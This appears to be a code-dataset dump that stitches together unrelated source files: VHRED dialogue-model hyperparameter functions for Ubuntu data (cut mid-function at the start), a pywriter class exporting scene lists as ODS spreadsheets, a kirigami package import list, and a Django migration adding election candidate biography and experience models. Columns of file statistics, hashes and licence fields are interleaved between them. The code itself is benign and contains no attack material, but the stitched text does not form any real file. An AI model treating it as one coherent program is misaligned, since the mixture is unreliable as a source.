state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.5
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp12():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.5
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp13():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.75
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp14():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.75
return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp15():
state = prototype_state()
state['end_sym_utterance'] = '__eot__'
state['unk_sym'] = 0 # Unknown word token <unk>
state['eos_sym'] = 1 # end-of-utterance symbol </s>
state['eod_sym'] = -1 # end-of-dialogue symbol </d>
state['first_speaker_sym'] = -1 # first speaker symbol <first_speaker>
state['second_speaker_sym'] = -1 # second speaker symbol <second_speaker>
state['third_speaker_sym'] = -1 # third speaker symbol <third_speaker>
state['minor_speaker_sym'] = -1 # minor speaker symbol <minor_speaker>
state['voice_over_sym'] = -1 # voice over symbol <voice_over>
state['off_screen_sym'] = -1 # off screen symbol <off_screen>
state['pause_sym'] = -1 # pause symbol <pause>
state['train_dialogues'] = "../UbuntuData/Training.dialogues.pkl"
state['test_dialogues'] = "../UbuntuData/Test.dialogues.pkl"
state['valid_dialogues'] = "../UbuntuData/Validation.dialogues.pkl"
state['dictionary'] = "../UbuntuData/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 5000
state['prefix'] = "UbuntuModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['utterance_decoder_gating'] = 'LSTM'
state['direct_connection_between_encoders_and_decoder'] = True
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
# Latent variable configuration
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/75000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['deep_utterance_decoder_input'] = True
state['patience'] = 20
state['kl_divergence_max_weight'] = 0.75
return state
| 37.500916
| 127
| 0.719992
| 12,960
| 102,340
| 5.344522
| 0.044599
| 0.034173
| 0.033264
| 0.044467
| 0.905363
| 0.894723
| 0.881008
| 0.871248
| 0.861821
| 0.848524
| 0
| 0.027242
| 0.163191
| 102,340
| 2,729
| 128
| 37.500916
| 0.78156
| 0.192994
| 0
| 0.938043
| 0
| 0
| 0.530746
| 0.409382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022003
| false
| 0
| 0.001737
| 0
| 0.045744
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1b9c1e462e14e1ccaa27a39c0113f4e587eba367
| 9,888
|
py
|
Python
|
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
"""Provide a class for ODS scene list export.
Copyright (c) 2022 Peter Triesberger
For further information see https://github.com/peter88213/PyWriter
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
from pywriter.ods.ods_file import OdsFile
class OdsSceneList(OdsFile):
"""ODS scene list representation."""
DESCRIPTION = 'Scene list'
SUFFIX = '_scenelist'
# Column width:
# co1 2.000cm
# co2 3.000cm
# co3 4.000cm
# co4 8.000cm
# Header structure:
# Scene link
# Scene title
# Scene description
# Tags
# Scene notes
# A/R
# Goal
# Conflict
# Outcome
# Scene
# Words total
# $FieldTitle1
# $FieldTitle2
# $FieldTitle3
# $FieldTitle4
# Word count
# Letter count
# Status
# Characters
# Locations
# Items
_fileHeader = f'''{OdsFile._CONTENT_XML_HEADER}{DESCRIPTION}" table:style-name="ta1" table:print="false">
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-row table:style-name="ro1">
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Scene link</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Scene title</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Scene description</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Tags</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Scene notes</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>A/R</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Goal</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Conflict</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Outcome</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Scene</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Words total</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>$FieldTitle1</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>$FieldTitle2</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>$FieldTitle3</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>$FieldTitle4</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Word count</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Letter count</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Status</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Characters</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Locations</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" office:value-type="string">
<text:p>Items</text:p>
</table:table-cell>
<table:table-cell table:style-name="Heading" table:number-columns-repeated="1003"/>
</table:table-row>
'''
_sceneTemplate = ''' <table:table-row table:style-name="ro2">
<table:table-cell table:formula="of:=HYPERLINK("file:///$ProjectPath/${ProjectName}_manuscript.odt#ScID:$ID%7Cregion";"ScID:$ID")" office:value-type="string" office:string-value="ScID:$ID">
<text:p>ScID:$ID</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Title</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Desc</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Tags</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Notes</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$ReactionScene</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Goal</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Conflict</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Outcome</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$SceneNumber">
<text:p>$SceneNumber</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$WordsTotal">
<text:p>$WordsTotal</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$Field1">
<text:p>$Field1</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$Field2">
<text:p>$Field2</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$Field3">
<text:p>$Field3</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$Field4">
<text:p>$Field4</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$WordCount">
<text:p>$WordCount</text:p>
</table:table-cell>
<table:table-cell office:value-type="float" office:value="$LetterCount">
<text:p>$LetterCount</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Status</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Characters</text:p>
</table:table-cell>
<table:table-cell office:value-type="string">
<text:p>$Locations</text:p>
</table:table-cell>
<table:table-cell>
<text:p>$Items</text:p>
</table:table-cell>
</table:table-row>
'''
_fileFooter = OdsFile._CONTENT_XML_FOOTER
def _get_sceneMapping(self, scId, sceneNumber, wordsTotal, lettersTotal):
"""Return a mapping dictionary for a scene section.
Positional arguments:
scId -- str: scene ID.
sceneNumber -- int: scene number to be displayed.
wordsTotal -- int: accumulated wordcount.
lettersTotal -- int: accumulated lettercount.
Scene rating "1" is not applicable.
Extends the superclass template method.
"""
sceneMapping = super()._get_sceneMapping(scId, sceneNumber, wordsTotal, lettersTotal)
if self.scenes[scId].field1 == '1':
sceneMapping['Field1'] = ''
if self.scenes[scId].field2 == '1':
sceneMapping['Field2'] = ''
if self.scenes[scId].field3 == '1':
sceneMapping['Field3'] = ''
if self.scenes[scId].field4 == '1':
sceneMapping['Field4'] = ''
return sceneMapping
| 43.179039
| 215
| 0.638451
| 1,292
| 9,888
| 4.873839
| 0.118421
| 0.176274
| 0.188979
| 0.196125
| 0.728601
| 0.728601
| 0.721613
| 0.721613
| 0.721613
| 0.718437
| 0
| 0.010944
| 0.186792
| 9,888
| 228
| 216
| 43.368421
| 0.772168
| 0.088896
| 0
| 0.581395
| 0
| 0.267442
| 0.89881
| 0.510338
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005814
| false
| 0
| 0.005814
| 0
| 0.052326
| 0.005814
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
1bbce6d6eea87aadfbaa38c2fc66bfbc3654eccd
| 205
|
py
|
Python
|
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | null | null | null |
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | 2
|
2021-01-18T03:53:35.000Z
|
2021-04-01T02:35:02.000Z
|
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | null | null | null |
from kirigami.nn.regularize import *
from kirigami.nn.reshape import *
from kirigami.nn.loss import *
from kirigami.nn.lstm_wrapper import *
from kirigami.nn.resnet import *
from kirigami.nn.spot import *
| 29.285714
| 38
| 0.795122
| 31
| 205
| 5.225806
| 0.354839
| 0.444444
| 0.518519
| 0.617284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117073
| 205
| 6
| 39
| 34.166667
| 0.895028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
59ed6583308ab34b301f9a5c8b63d99cf5e59ed8
| 8,882
|
py
|
Python
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | 2
|
2018-11-16T21:45:17.000Z
|
2019-02-03T19:55:46.000Z
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | 13
|
2018-08-17T19:12:11.000Z
|
2022-03-11T23:27:41.000Z
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-05-10 07:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('elections', '0048_presidentcandidatebiography'),
]
operations = [
migrations.CreateModel(
name='EuroParliamentCandidateBiography',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio_period', models.CharField(blank=True, max_length=15, verbose_name='Periodas')),
('bio_text', models.TextField(blank=True, verbose_name='Biografijos įrašas')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
],
options={
'verbose_name': 'Biografijos įrašas',
'verbose_name_plural': 'Biografijos įrašai',
'ordering': ['-created_at'],
},
),
migrations.CreateModel(
name='EuroParliamentCandidatePoliticalExperience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
('office', models.CharField(blank=True, max_length=100, verbose_name='Institucija')),
('start', models.DateField(blank=True, verbose_name='Pereigų pradžia')),
('end', models.DateField(blank=True, verbose_name='Pereigų pabaiga')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
],
options={
'verbose_name': 'Politinė patirties įrašas',
'verbose_name_plural': 'Politinės patirties įrašai',
'ordering': ['created_at'],
},
),
migrations.CreateModel(
name='EuroParliamentCandidateWorkExperience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
('office', models.CharField(blank=True, max_length=100, verbose_name='Darbovietė')),
('start', models.DateField(blank=True, verbose_name='Pereigų pradžia')),
('end', models.DateField(blank=True, verbose_name='Pereigų pabaiga')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
],
options={
'verbose_name': 'Darbo patirties įrašas',
'verbose_name_plural': 'Darbo patirties įrašai',
'ordering': ['created_at'],
},
),
migrations.CreateModel(
name='PresidentCandidatePoliticalExperience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
('office', models.CharField(blank=True, max_length=100, verbose_name='Institucija')),
('start', models.DateField(blank=True, null=True, verbose_name='Pereigų pradžia')),
('end', models.DateField(blank=True, null=True, verbose_name='Pereigų pabaiga')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
],
options={
'verbose_name': 'Politinė patirties įrašas',
'verbose_name_plural': 'Politinės patirties įrašai',
'ordering': ['created_at'],
},
),
migrations.CreateModel(
name='PresidentCandidateWorkExperience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
('office', models.CharField(blank=True, max_length=100, verbose_name='Darbovietė')),
('start', models.DateField(blank=True, null=True, verbose_name='Pereigų pradžia')),
('end', models.DateField(blank=True, null=True, verbose_name='Pereigų pabaiga')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
],
options={
'verbose_name': 'Darbo patirties įrašas',
'verbose_name_plural': 'Darbo patirties įrašai',
'ordering': ['created_at'],
},
),
migrations.AddField(
model_name='europarliamentcandidate',
name='birth_date',
field=models.DateField(blank=True, null=True, verbose_name='Gimimo data'),
),
migrations.AddField(
model_name='europarliamentcandidate',
name='birth_place',
field=models.CharField(blank=True, max_length=100, verbose_name='Gimimo vieta'),
),
migrations.AddField(
model_name='europarliamentcandidate',
name='hobbies',
field=models.CharField(blank=True, max_length=500, verbose_name='Pomėgiai'),
),
migrations.AddField(
model_name='europarliamentcandidate',
name='languages',
field=models.CharField(blank=True, max_length=300, verbose_name='Užsienio kalbos'),
),
migrations.AddField(
model_name='presidentcandidate',
name='birth_date',
field=models.DateField(blank=True, null=True, verbose_name='Gimimo data'),
),
migrations.AddField(
model_name='presidentcandidate',
name='birth_place',
field=models.CharField(blank=True, max_length=100, verbose_name='Gimimo vieta'),
),
migrations.AddField(
model_name='presidentcandidate',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, verbose_name='Kandidato el. paštas'),
),
migrations.AddField(
model_name='presidentcandidate',
name='hobbies',
field=models.CharField(blank=True, max_length=500, verbose_name='Pomėgiai'),
),
migrations.AddField(
model_name='presidentcandidate',
name='languages',
field=models.CharField(blank=True, max_length=300, verbose_name='Užsienio kalbos'),
),
migrations.AlterField(
model_name='presidentcandidate',
name='party',
field=models.CharField(blank=True, help_text='Jeigu kandidatas - be partijos, nurodykite, kad savarankiškas', max_length=280, verbose_name='Partija'),
),
migrations.AddField(
model_name='presidentcandidateworkexperience',
name='candidate',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='work_experience', to='elections.PresidentCandidate'),
),
migrations.AddField(
model_name='presidentcandidatepoliticalexperience',
name='candidate',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='political_experience', to='elections.PresidentCandidate'),
),
migrations.AddField(
model_name='europarliamentcandidateworkexperience',
name='candidate',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='work_experience', to='elections.EuroParliamentCandidate'),
),
migrations.AddField(
model_name='europarliamentcandidatepoliticalexperience',
name='candidate',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='political_experience', to='elections.EuroParliamentCandidate'),
),
migrations.AddField(
model_name='europarliamentcandidatebiography',
name='candidate',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='biographies', to='elections.EuroParliamentCandidate'),
),
]
| 51.34104
| 162
| 0.612362
| 815
| 8,882
| 6.487117
| 0.158282
| 0.11027
| 0.062417
| 0.072631
| 0.810857
| 0.805372
| 0.774352
| 0.743333
| 0.704558
| 0.704558
| 0
| 0.010515
| 0.261202
| 8,882
| 172
| 163
| 51.639535
| 0.795184
| 0.005066
| 0
| 0.771084
| 1
| 0
| 0.243237
| 0.072326
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012048
| 0
| 0.03012
| 0
| 0
| 0
